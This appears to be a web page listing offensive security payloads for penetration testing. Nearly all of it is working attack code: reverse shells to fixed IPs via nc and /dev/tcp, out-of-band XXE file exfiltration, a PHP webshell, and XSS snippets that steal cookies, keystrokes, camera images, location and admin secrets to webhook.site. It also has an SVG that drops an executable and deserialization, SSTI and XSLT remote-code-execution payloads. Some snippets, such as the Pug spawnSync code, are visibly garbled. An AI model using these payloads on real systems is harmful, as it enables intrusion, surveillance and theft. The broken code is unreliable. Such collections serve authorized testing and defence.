Payloads Search


Comprehensive collection of security payloads for penetration testing and vulnerability research. Includes XSS payloads, SSTI injection, XXE attacks, command injection, SQL injection, LFI/RFI, deserialization exploits, and more. Essential resource for bug bounty hunters, security researchers, and ethical hackers testing web applications and APIs.

print hex kernel exploitation mhl

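/*
 * Dump n 64-bit words from buffer to stderr, one per line, formatted as
 * "[index] 0xvalue" in hexadecimal, after a "=== hex ===" header line.
 *
 * buffer: array of at least n uint64_t values. The function reads exactly
 *         n words and has no way to check that bound; the caller owns it.
 * n:      number of words to print; zero or a negative value prints only
 *         the header.
 */
void examine(uint64_t* buffer, int n){
  fprintf(stderr, "=== hex ===\n");
  if (buffer == NULL) {
      return;  /* nothing to dump; do not dereference a null pointer */
  }
  for (int i = 0; i < n; i++){
      /* Cast so each argument matches its conversion on every ABI:
         uint64_t is not `unsigned long` on LLP64 or 32-bit targets. */
      fprintf(stderr, "[%04x] 0x%016llx\n", (unsigned)i, (unsigned long long)buffer[i]);
  }
}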

command injection sleep 5

"$(sleep 5)"

hexprint kernel exploitation

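/*
 * Hex-dump size bytes starting at buf to stdout, 16 bytes per row.
 *
 * Each row is "<address>: 0x<bytes 0-7> 0x<bytes 8-15>", with bytes printed
 * in memory order. A short final row prints only the bytes that lie inside
 * [buf, buf + size). A blank line terminates the dump.
 *
 * buf:  start of the region to dump; a null pointer is treated as empty.
 * size: number of bytes to dump.
 */
void hex_print(void *buf, size_t size)
{
    /* Byte pointer: arithmetic on void * is a compiler extension. */
    const unsigned char *p = (const unsigned char *)buf;

    if (p == NULL)
        size = 0;   /* nothing to read; still emit the trailing blank line */

    for (size_t i = 0; i < size; i += 0x10) {
        printf("%016llx: ", (unsigned long long)(size_t)(p + i));
        /* Two 8-byte groups; the second one starts at offset 8 of the row
           rather than repeating the first eight bytes. */
        for (size_t group = 0; group < 0x10; group += 8) {
            if (group != 0)
                printf(" ");
            printf("0x");
            /* Stop at size so a short last row never reads out of bounds. */
            for (size_t j = group; j < group + 8 && i + j < size; j++)
                printf("%02x", p[i + j]);
        }
        puts("");
    }
    puts("");
}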

path leak pdf server-side render

<img src="x" onerror="document.write(window.location)"/>

basic pdf server-side render

<img src="x" onerror="document.write('poc')"/>

smaller toybox mkfifo shell

cd /data/data/com.ian.demo;rm f;mkfifo f;cat f|/system/bin/sh 2>&1|toybox nc 10.11.3.2 4444 >f

android reverse shell toybox

rm /data/data/com.ian.demo/f;/system/bin/toybox mkfifo /data/data/com.ian.demo/f;cat /data/data/com.ian.demo/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc 10.11.3.2 4444 >/data/data/com.ian.demo/f

XXE dtd error based

<!ENTITY % file SYSTEM "file:///usr/local/"> <!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'file:///nonexistant/%file;'>"> %eval; %exfiltrate;

Only magic bytes file upload check bypass

echo -ne '‰PNG

<?php echo "POC";system($_GET['''cmd''']); ?>' > file.png.php

Google Storage dir recursive download

curl -s "https://storage.googleapis.com/PUBLIC_FOLDER" | xmllint --xpath "//*[local-name()='Key']/text()" - | while read -r key; do mkdir -p "$(dirname "$key")" && curl -s "https://storage.googleapis.com/PUBLIC_FOLDER/$key" -o "$key" && echo "Downloaded: $key"; done

Exfiltrate files Windows

$bytes = [System.IO.File]::ReadAllBytes("file.txt");Invoke-RestMethod -Uri "https://webhook.site/upload" -Method POST -Body $bytes -ContentType "application/octet-stream"

poc.dtd for OOB XXE (for xml upload / import) -> on vps

<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % all "<!ENTITY send SYSTEM 'https://webhook.site/{id}/leak?data=%file;'>">
%all;

OOB XXE in XML upload / import -> poc.xml

<?xml version="1.0"?>
<!-- Depends on the parser fetching an external DTD and expanding parameter entities (the % dtd declaration and its reference below). A parser that rejects DOCTYPE declarations, or that has external DTD loading and external general/parameter entities turned off, stops here instead of requesting poc.dtd. Egress filtering on the host that parses uploads also blocks the http:// fetch. -->
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://vps.ian.nl/poc.dtd">
  %dtd;
]>
<data>&send;</data>

file.dtd for OOB XXE (for XXE XLSX oneliner) -> on vps

<!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://{webhook}/?x=%file;'>">
%eval;
%exfil;

XXE XLSX oneliner -> malicious_example.xlsx

unzip sheet.xlsx -d extracted_xlsx && awk 'NR==1{print; print "<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://vps.ian.nl/file.dtd"> %xxe;]>"; next} $0 != "<?xml version="1.0" encoding="UTF-8" standalone="yes"?>" {print}' extracted_xlsx/xl/worksheets/sheet1.xml > tmp && mv tmp extracted_xlsx/xl/worksheets/sheet1.xml && cd extracted_xlsx && zip -r ../malicious_example.xlsx * >/dev/null && cd ..

NodeJS RCE Deserialization - node-serialize

import requests, base64, json
# JavaScript expression carried inside the payload; this one reads a local file.
js = "require('fs').readFileSync('/etc/passwd','utf8')"
# Re-encode the expression as comma-separated character codes for String.fromCharCode.
codes = ','.join(str(ord(c)) for c in js)
# The value is a string that starts with the _$$ND_FUNC$$_ marker and ends in "()".
# Per the snippet title this targets node-serialize; presumably the server passes the
# decoded "profile" field to its unserialize() - verify against the target code.
# Defence: never hand client-controlled data to a deserialiser that can revive
# functions; parse with JSON.parse and validate the resulting shape.
# Detection: the literal marker _$$ND_FUNC$$_ inside a decoded request field.
payload = {"name": "_$$ND_FUNC$$_function(){return eval(String.fromCharCode(" + codes + "))}()"}
# NOTE(review): `url` is not defined anywhere in this snippet.
# The JSON payload is base64-encoded and sent as the "profile" field of a JSON body.
res = requests.post(url, json={"profile": base64.b64encode(json.dumps(payload).encode()).decode()})
print(res.text)

XSLT RCE - Apache xalan 1.0

<xsl:stylesheet version="1.0"
  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
  xmlns:br="http://xml.apache.org/xalan/java/java.io.BufferedReader"
  xmlns:isr="http://xml.apache.org/xalan/java/java.io.InputStreamReader">
<xsl:template match="/">
  <xsl:variable name="p" select="rt:exec(rt:getRuntime(),'ping.exe w85z4z4aiuapnmvlyby5tf94zv5mtch1.oastify.com')"/>
  <xsl:variable name="r" select="br:readLine(br:new(isr:new($p/inputStream)))"/>
  <xsl:value-of select="$r"/>
</xsl:template>
</xsl:stylesheet>

LFI - Apache xalan 1.0 & Saxon 9.x.x.x

<?xml version="1.0" encoding="utf-8"?>
<xsl:transform version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:saxon="http://saxon.sf.net/">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:text>poc</xsl:text>
<out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem">
<xsl:value-of select="unparsed-text('file:///C:/Windows/System32/drivers/etc/hosts')"/>
</out>
<xsl:text>poc</xsl:text>
</xsl:template>
</xsl:transform>

XSLT RCE Apache Java

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:process="http://xml.apache.org/xalan/java/java.lang.Process" xmlns:instrrdr="http://xml.apache.org/xalan/java/java.io.InputStreamReader" xmlns:buf="http://xml.apache.org/xalan/java/java.io.BufferedReader" xmlns:obj="http://xml.apache.org/xalan/java/java.lang.Object">
<!-- Works only when the processor resolves the xalan/java extension namespaces declared on the root element, which bind the rt, process, instrrdr, buf and obj prefixes to Java classes. Defence: never run an untrusted stylesheet with extension functions enabled; in JAXP, setting XMLConstants.FEATURE_SECURE_PROCESSING on the TransformerFactory typically disables them (confirm for the processor version in use). Detection: stylesheet input that declares any xml.apache.org/xalan/java namespace. -->
<xsl:template match="/">
<xsl:variable name="cmd">whoami</xsl:variable>
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,$cmd)"/>
<xsl:variable name="inputStream" select="process:getInputStream($process)"/>
<xsl:variable name="inputStreamRdr" select="instrrdr:new($inputStream)"/>
<xsl:variable name="bufReader" select="buf:new($inputStreamRdr)"/>
<xsl:variable name="ts" select="obj:toString(buf:readLine($bufReader))"/>
<xsl:value-of select="$ts" />
</xsl:template>
</xsl:stylesheet>

lfi with zip symlink

ln -s /etc/passwd passwd.txt && zip --symlink test.zip passwd.txt

XSLT version leak

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<br />Version: <xsl:value-of select="system-property('xsl:version')" />
<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
</html>

XSLT read dir - libxslt

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="php:function('opendir','./')"/>
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
<xsl:value-of select="php:function('readdir')"/> -
</xsl:template></xsl:stylesheet>

PHP filesystem listing with json_encode

<?=json_encode(scandir("/"));

PHP filesystem Object based enum

<?=foreach (new DirectoryIterator("/") as $f) echo $f."\n";

PHP filesystem enum with glob

<?=print_r(glob("/*"));

PHP directory listing with array_walk

<?=array_walk(scandir("/"), function($v) { echo $v . "\n"; });>

PHP directory listing with scandir

<?=var_dump(scandir("/"));

PHP directory listing with array_map

<?=array_map(function($f){ echo $f."
"; }, scandir("/"));

PHP lfi with highlight_file

<?=highlight_file('/etc/passwd');

PHP lfi with readgzfile

<?=readgzfile('/etc/passwd');

PHP standard lfi

<?=file_get_contents("/etc/passwd");

PHP lfi

<?=highlight_file('/etc/passwd');

Bypass XSS filter (gareth heyes)

<svg><a><animate attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(origin)&semi;0" /><text x=20 y=20>XSS</text></a>

JSONPath Plus RCE ≤ 10.2.0

$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/192.168.1.1/443 0>&1"').toString())";cmd=''[['constructor']][['constructor']](p);cmd())]

.htaccess mime type bypass

# Maps the .poc extension to the PHP media type for the directory that holds this file.
# It takes effect only where Apache honours per-directory overrides for this directive.
# Defence: set AllowOverride None on upload directories, reject uploads named .htaccess,
# and store uploaded files outside the document root.
AddType application/x-httpd-php .poc

SSTI polyglot

${{<%[%'"}}%.

Blind Command Injection

cat flag*|curl -d@- https://webhook.site/{webhook-id}

GraphQL Introspection Query

{__schema{types{name,fields{name}}}}

SMTP Injection CC

email=victim%40company.com%0d%0acc%3a%20hacker%40protonmail.com%0d%0a

Standard XSS

<img src onerror=alert(1)>

SSRF to redirect LFI in PDF

//1. Host this code on VPS as lfi.php
<?php header('Location: file://' . $_GET['url']); ?> 
//2. Run the server
php -S 0.0.0.0:8888
//3. Input this in PDF
<iframe src="http://{vps_ip}:8888/lfi.php?url=%2fetc%2fpasswd" width="800" height="1000"></iframe>

Three PDF SSRF

<img src="https://{webhook_url}/1"/>
<link rel="stylesheet" href="https://{webhook_url}/2">
<iframe src="https://{webhook_url}/3"></iframe>

WebSocket XSS Cookie Stealer

<img src="x" onerror="socket.send(document.cookie)">

Chromium tab Crash CSS (old)

<iframe style="background:conic-gradient(in rec2020,red,red)">

Keylogger XSS with history.replaceState

<img src onerror='
history.replaceState(null, null, "../../../login");
let buffer = "";
document.onkeypress=function(e){
    buffer += String.fromCharCode(e.which);
    if(buffer.length >= 25) {
        fetch("https://webhook.site/{webhook-id}/?k=" + buffer);
        buffer = "";
    }
},this.remove();
'></img>

AngularJS CSTI

{{$on.constructor('alert(1)')()}}

SVG Malware Smuggler

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="500" height="500">
    <text x="10"="50" font-family="Arial" font-size="20" fill="black">Open this image in a new tab</text>
    <script type="application/ecmascript"><![CDATA[
        document.addEventListener("DOMContentLoaded", function() {
            function base64ToArrayBuffer(base64) {
                var binary_string= window.atob(base64);
                var len= binary_string.length;
                var bytes= new Uint8Array(len);
                for (var i= 0; i < len; i++) { bytes[i= binary_string.charCodeAt(i); }
                return bytes.buffer;
            }
            var file= 'U2FtcGxlIGZpbGUgYnkgaWFu'; // base64 encoded payload
            var data= base64ToArrayBuffer(file);
            var blob= new Blob([data], {type: 'octet/stream'});
            var a= document.createElementNS('http://www.w3.org/1999/xhtml', 'a');
            document.documentElement.appendChild(a);
            a.setAttribute('style', 'display: none');
            var url= window.URL.createObjectURL(blob);
            a.href= url;
            a.download= 'sample.exe'; // filename
            a.click();
            window.URL.revokeObjectURL(url);
        });
    ]]></script>
</svg>

Geolocation (GPS) Stealer

<script>
// getCurrentPosition is gated by the browser's geolocation permission and needs a
// secure context: the user is prompted unless the origin was granted access earlier.
// Defence: send "Permissions-Policy: geolocation=()" on pages that never need location,
// and restrict connect-src in the Content-Security-Policy so the POST below cannot
// reach an arbitrary host. The root fix is the script injection itself.
navigator.geolocation.getCurrentPosition(p=>{
  // Success callback: posts latitude, longitude, accuracy and an ISO timestamp as JSON.
  fetch("https://webhook.site/{webhook_url}",{
    method:'POST',
    body:JSON.stringify({
      lat:p.coords.latitude,
      lon:p.coords.longitude,
      accuracy:p.coords.accuracy,
      timestamp:new Date().toISOString()
    })
  });
},e=>console.error(e),{enableHighAccuracy:true}); // error callback only logs to the console
</script>

XSS Leak Browser information

document.addEventListener('DOMContentLoaded', async () => {
    const battery = await navigator.getBattery();
    const gl = document.createElement('canvas').getContext('webgl');
    const debugInfo = gl?.getExtension('WEBGL_debug_renderer_info');
    const tzid = Intl.DateTimeFormat().resolvedOptions().timeZone;

    fetch('https://webhook.site/{webhook_id}/', {
        method: 'POST',
        headers: {'Content-Type': 'application/json'},
        body: JSON.stringify({
            language: navigator.language,
            charging: battery.charging,
            battery: battery.level * 100,
            ram: navigator.deviceMemory,
            timezone: tzid,
            webgl: debugInfo ? `Vendor: ${gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL)}, Renderer: ${gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)}` : 'WebGL not supported'
        })
    });
});

Leverage XSS to Capture Photos and Videos

<script>
const v = document.createElement('video'),
      c = document.createElement('canvas');

navigator.mediaDevices?.getUserMedia({video:1})
    .then(s => {
        v.srcObject = s;
        v.play();
        v.onloadeddata = () => setTimeout(() => {
            c.width = v.videoWidth;
            c.height = v.videoHeight;
            c.getContext('2d').drawImage(v, 0, 0);
            fetch('https://webhook.site/{webhook-id}/', {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({
                    image: c.toDataURL('image/jpeg'),
                    timestamp: new Date().toISOString()
                })
            });
            s.getTracks().forEach(t => t.stop());
        }, 1000);
    })
    .catch(e => alert('Camera access error'));
</script>

Prepared Statement Bypass NodeJS MySQL

{"username": "admin", "password": {"password": 1}}
    username=admin&password[password]=1

Race Condition on coupons -> purchase endpoint

import httpx
import asyncio
url = "http://example.com"

async def apply_coupon(session):
    """Send one coupon-apply request and merge the response cookies into `session`.

    session: cookie jar shared by every concurrent call; it is sent with the
        request and updated in place from the response.

    Each call opens its own httpx.AsyncClient rather than reusing one client.
    """
    async with httpx.AsyncClient() as client:
        response = await client.post(url + "/api/coupons/apply", json={"coupon_code": "SUMMER_2024"}, cookies=session)
        session.update(response.cookies)

async def main():
    """Reset state, issue the coupon-apply requests concurrently, then purchase again.

    NOTE(review): what this exercises is a check-then-act gap on the server, where
    several requests can read "coupon unused" before any of them records the use.
    The fix belongs server-side: redeem atomically (one transaction with a row
    lock, or a unique constraint on user + coupon). The server code is not shown
    here, so confirm against the actual implementation.
    """
    async with httpx.AsyncClient() as client:
        # Session cookies come from the reset endpoint.
        session = (await client.get(url + '/api/reset')).cookies
        response = await client.post(url + "/api/purchase", json={"item": "BEER"})
        session.update(response.cookies)

        # range(1, 20) yields 19 coroutines; gather() runs them concurrently.
        await asyncio.gather(*(apply_coupon(session) for _ in range(1, 20)))

        # Final purchase with the accumulated cookies; prints the 'flag' field of the JSON reply.
        response = await client.post(url + "/api/purchase", json={"item": "BEER"}, cookies=session)
        print(response.json().get('flag'))

asyncio.run(main())

XSS to Steal Secrets from (admin) pages

<script>
// Both requests are made by the browser that renders the injected markup.
// The first response body is readable only if that page is same-origin with
// http://localhost:1337 or the server opts in through CORS.
// Defence: fix the injection with output encoding; a Content-Security-Policy with a
// restrictive connect-src stops the second request from reaching an external host.
fetch("http://localhost:1337/admin-secret.txt")
  .then(r => r.text())
  // The response text is base64-encoded and appended to the URL path of the second request.
  .then(d => fetch("https://webhook.site/webhook-id/" + btoa(d)))
</script>

NoSQL injection

{"username": {"$ne": null}, "password": {"$ne": null} }

Node eval RCE

require('child_process').exec('sh -c "nc 192.168.1.2 9001 -e sh"')

Stealing Cookies with fetch

<img src=x onerror="javascript:fetch('https://webhook.site/{id}'),{method:'POST',mode:'no-CORS',body:document.cookie});">

Stealing Cookies

<img src=x onerror=this.src="https://webhook.site/?c="+document.cookie>

PHP webshell cmd

<?php echo "Shell";system($_GET['cmd']); ?>

Stealing Cookies less known way

javascript:navigator.sendBeacon('https://webhook.site/{webhook-id}/?c='+document.cookie)

Python Pickle Deserialization

import pickle
import base64
import os

class Exploit:
    # pickle stores the (callable, args) pair returned by __reduce__, and the
    # unpickler calls it while loading. This is why pickle.loads() on data from an
    # untrusted source amounts to arbitrary code execution.
    # Defence: never unpickle untrusted input; use a data-only format such as JSON,
    # or verify an HMAC over the blob before loading it.
    # Detection: pickletools.dis() disassembles a pickle without executing it and
    # shows the global it references.
    def __reduce__(self):
        return (os.system, ('nc 192.168.2.177 9001 -e sh',))
# Serialise one instance and print the pickle as base64 text.
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)

XSS in SVG

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- SVG is XML and may carry script. Browsers run the script when the file is opened as a document (navigated to directly, or embedded through iframe, object or embed) and not when it is loaded through an img element. Defence for user-uploaded SVG: serve it with Content-Disposition: attachment or from a separate origin, sanitise out script elements and event-handler attributes, and apply a Content-Security-Policy that forbids inline script. -->
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(1);
   </script>
</svg>

Prototype Pollution RCE in Pug

"__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'')"
    }

JsDelivr CSP Bypass

<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>

PUG SSTI to RCE

#{spawn_sync = this.process.binding('spawn_sync')}
#{normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}}
#{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;} for(c=0;c<a.stdio.length;c++){var e=a.stdio[c] && a.stdio[c].input;if(e=null){var f=a.stdio[c]= util._extend({},a.stdio[c]);isUint8Array(e) ? f.input=e : f.input=Buffer.from(e,a.encoding);}} console.log(a); var b=spawn_sync.spawn(a); if(b.output && a.encoding && a.encoding='buffer') for(=0;c<b.output.length;c++){ if(!b.output[c]) continue; b.output[c=b.output[c].toString(a.encoding); } return b.stdout=b.output && b.output[1], b.stderr=b.output && b.output[2], b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)), b;}}
#{payload='YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjAuNDAvODA4MCAwPiYx'}
#{resp=spawnSync('bash',['-c',(new Buffer(payload, 'base64')).toString('ascii')])}

Vue.js V2 CSTI

{{constructor.constructor('alert(1)')()}}

Vue.js V3 CSTI

{{_openBlock.constructor('alert(1)')()}}

XSS in CDATA steal Login Credentials

<![CDATA[<]]><img src="x" onerror="var credentials=prompt('Please insert username and password separated by a colon (e.g., username:password):'); if(credentials) { var img=new Image(); img.src='https://ujhhrlvlfyivfk73njj018g7tyzpngb5.oastify.com?credentials=' + encodeURIComponent(credentials); document.body.appendChild(img); }"/><![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>

About Security Payloads

This payload collection contains real-world exploit techniques for testing web application security, including Cross-Site Scripting (XSS), Server-Side Template Injection (SSTI), XML External Entity (XXE), Server-Side Request Forgery (SSRF), Local File Inclusion (LFI), Remote Code Execution (RCE), SQL injection, NoSQL injection, and deserialization attacks. Each payload is documented with practical examples for bug bounty hunting and security assessments.

The payloads cover multiple technologies including PHP, Node.js, Python, Java, Vue.js, AngularJS, Pug templates, and more. Use these for authorized penetration testing, Capture The Flag (CTF) competitions, security research, and learning about common web vulnerabilities.

Whether you're testing for OWASP Top 10 vulnerabilities or learning application security, this searchable payload database helps you quickly find the right exploit technique. Stay updated with the latest attack vectors and bypass techniques for modern web applications and APIs.